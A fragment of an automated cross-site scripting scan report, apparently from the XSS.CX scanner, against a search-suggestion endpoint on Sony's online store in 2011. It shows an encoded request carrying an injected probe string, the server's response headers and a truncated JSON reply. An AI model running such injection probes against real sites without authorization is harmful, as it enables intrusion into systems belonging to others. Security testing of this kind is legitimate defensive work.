s_sq=sonysonystyle2007prod%3D%2526pid%253Dhttp%25253A//store.sony.com/webapp/wcs/stores/servlet/SearchCatalog%25253FNtt%25253Ddvd%25252Bcd22e7a%2525250af613d80aa8c%252526langId%25253D-1%252526Ntk%25253DProduct%252526storeId%25253D10151%252526Ntx%25253Dmode%25252Bmatchallpartial%252526y%25253D0%252526N%25253D4294951323%252526catalogId%25253D10551%252526x%25253D0%252526navigation%25253DCategory%2526oid%253Dhttp%25253A//store.sony.com/wcsstore/SonyStyleStorefrontAssetStore/img/global/search_submit_arrow.gif%2526ot%253DIMAGE

Response

HTTP/1.1 200 OK
ntCoent-Length: 811
Content-Type: text/html
Content-Language: en-US
Content-Length: 811
Date: Tue, 06 Sep 2011 18:58:53 GMT
Connection: close
Vary: Accept-Encoding
Set-Cookie: TS5bbf46=2b9c93f9c1945f2c1cd8b18716b437e20bd7c268cce2babb4e666d6d; Path=/
Cache-Control: private


{"ResultSet": {
"suggestionList": [
{
"value": "XSS680CX",
"description": "Xpl%26%23333%3Bd%26trade%3B%20CX%20Series%20Speakers",
"img_url": "/wcsstore/SonyStyleStorefrontAssetStore/img/75x49/XSV680C
...[SNIP]...

Report generated by XSS.CX at Tue Sep 06 18:03:58 GMT-06:00 2011.